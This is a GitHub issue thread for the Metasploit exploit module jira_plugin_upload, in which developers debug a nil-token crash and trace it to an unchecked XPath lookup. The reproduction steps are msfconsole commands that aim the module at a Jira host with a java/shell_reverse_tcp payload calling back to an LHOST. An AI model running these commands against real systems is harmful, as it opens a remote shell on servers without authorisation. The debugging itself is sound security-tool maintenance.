Metasploit-framework: NoMethodError undefined method `[]' for nil:NilClass

Created on 22 Mar 2019 · 12Comments · Source: rapid7/metasploit-framework

Steps to reproduce

msf5 > use exploit/multi/http/jira_plugin_upload
msf5 exploit(multi/http/jira_plugin_upload) > set HttpPassword <password>
msf5 exploit(multi/http/jira_plugin_upload) > set HttpUsername <username>
msf5 exploit(multi/http/jira_plugin_upload) > set RHOSTS jira-stage.company.com
msf5 exploit(multi/http/jira_plugin_upload) > set SSL true
msf5 exploit(multi/http/jira_plugin_upload) > set payload java/shell_reverse_tcp
msf5 exploit(multi/http/jira_plugin_upload) > set LHOST <lhostIP>
msf5 exploit(multi/http/jira_plugin_upload) > run

Expected behavior

[*] Started bind TCP handler against <IP>:4444
[*] Sending stage (2952 bytes) to <IP>

or
[*] Exploit completed, but no session was created.

Current behavior

What happens instead?

msf5 exploit(multi/http/jira_plugin_upload) > run

[*] Started reverse TCP handler on 10.150.29.100:4444
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass

System stuff

Metasploit version

metasploit v5.0.12-dev,

I installed Metasploit with:

installed via apt from kali subsystem on win10,

OS

Kali Linux from Windows 10 shop as subsystem

bug module

Source

rdek

Most helpful comment

@xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content'] might be causing the issue. res.get_html_document.at('meta[@id="atlassian-token"]') can return nil.

$ irb
2.6.1 :001 > require 'nokogiri'
 => true 
2.6.1 :002 > a = Nokogiri::HTML('<html><head><title>blah</title></head></html>')
 => #<Nokogiri::HTML::Document:0x2ac618f00c40 name="document" children=[#<Nokogiri::XML::DTD:0x2ac618f009d4 name="html">, #<Nokogiri::XML::Element:0x2ac618f00718 name="html" children=[#<Nokogiri::XML::Element:0x2ac618ef3fa4 name="head" children=[#<Nokogiri::XML::Element:0x2ac618ef3bf8 name="title" children=[#<Nokogiri::XML::Text:0x2ac618ef38ec "blah">]>]>]>]> 
2.6.1 :003 > a.at('meta[@id="atlassian-token"]')['content']
Traceback (most recent call last):
        4: from /home/msfdev/.rvm/rubies/ruby-2.6.1/bin/irb:23:in `<main>'
        3: from /home/msfdev/.rvm/rubies/ruby-2.6.1/bin/irb:23:in `load'
        2: from /home/msfdev/.rvm/rubies/ruby-2.6.1/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
        1: from (irb):3
NoMethodError (undefined method `[]' for nil:NilClass)
2.6.1 :004 > a.at('meta[@id="atlassian-token"]')
 => nil 
2.6.1 :005 >

jrobles-r7 on 22 Mar 2019

🎉3

All 12 comments

Do you get additional output with set verbose true ?

bcoles on 22 Mar 2019

Yes:

msf5 exploit(multi/http/jira_plugin_upload) > set verbose true
verbose => true
msf5 exploit(multi/http/jira_plugin_upload) > run

[*] Started HTTP reverse handler on http://<IP>:4444
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

rdek on 22 Mar 2019

Welp. I guess it's failing somewhere in access_login?, as execution never proceeds as far as print_status('Retrieving Session ID and XSRF token...')

  def access_login?
    res = query_login
    if res.nil?
      fail_with(Failure::Unknown, 'Unable to access the web application!')
    end
    return false unless res && res.code == 200
    @session_id = get_sid(res)
    @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
    return true
  end

# ...

  def exploit
    unless access_login?
      fail_with(Failure::Unknown, 'Unable to access the web application!')
    end
    print_status('Retrieving Session ID and XSRF token...')

# ...

@dubfr33 @space-r7

bcoles on 22 Mar 2019

Got hint!
When:

set RPORT

isn't valid - error occurs, when is valid - no error showed up:

msf5 exploit(multi/http/jira_plugin_upload) > run

[*] Started HTTP reverse handler on http://<IP>:4444
[*] Retrieving Session ID and XSRF token...
[*] Attempting to upload JRrKInwRj
[*] Error uploading JRrKInwRj
[*] HTTP Response Code: 401
[*] Server Response: {"subCode":"upm.websudo.error"}
[*] Exploit completed, but no session was created.

rdek on 22 Mar 2019

@xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content'] might be causing the issue. res.get_html_document.at('meta[@id="atlassian-token"]') can return nil.

$ irb
2.6.1 :001 > require 'nokogiri'
 => true 
2.6.1 :002 > a = Nokogiri::HTML('<html><head><title>blah</title></head></html>')
 => #<Nokogiri::HTML::Document:0x2ac618f00c40 name="document" children=[#<Nokogiri::XML::DTD:0x2ac618f009d4 name="html">, #<Nokogiri::XML::Element:0x2ac618f00718 name="html" children=[#<Nokogiri::XML::Element:0x2ac618ef3fa4 name="head" children=[#<Nokogiri::XML::Element:0x2ac618ef3bf8 name="title" children=[#<Nokogiri::XML::Text:0x2ac618ef38ec "blah">]>]>]>]> 
2.6.1 :003 > a.at('meta[@id="atlassian-token"]')['content']
Traceback (most recent call last):
        4: from /home/msfdev/.rvm/rubies/ruby-2.6.1/bin/irb:23:in `<main>'
        3: from /home/msfdev/.rvm/rubies/ruby-2.6.1/bin/irb:23:in `load'
        2: from /home/msfdev/.rvm/rubies/ruby-2.6.1/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
        1: from (irb):3
NoMethodError (undefined method `[]' for nil:NilClass)
2.6.1 :004 > a.at('meta[@id="atlassian-token"]')
 => nil 
2.6.1 :005 >

jrobles-r7 on 22 Mar 2019

🎉3

badumTss!

rdek on 22 Mar 2019

Can someone PR a fix? I nominate @rdek.

wvu-r7 on 22 Mar 2019

And tsk tsk, this is why we should always check the return value of XPath queries!

wvu-r7 on 22 Mar 2019

The check method will also need to be amended:

# grep get_html_document modules/exploits/multi/http/jira_plugin_upload.rb 
    @xsrf_token = login_res.get_html_document.at('meta[@id="atlassian-token"]')['content']
    @xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']

bcoles on 22 Mar 2019

👍1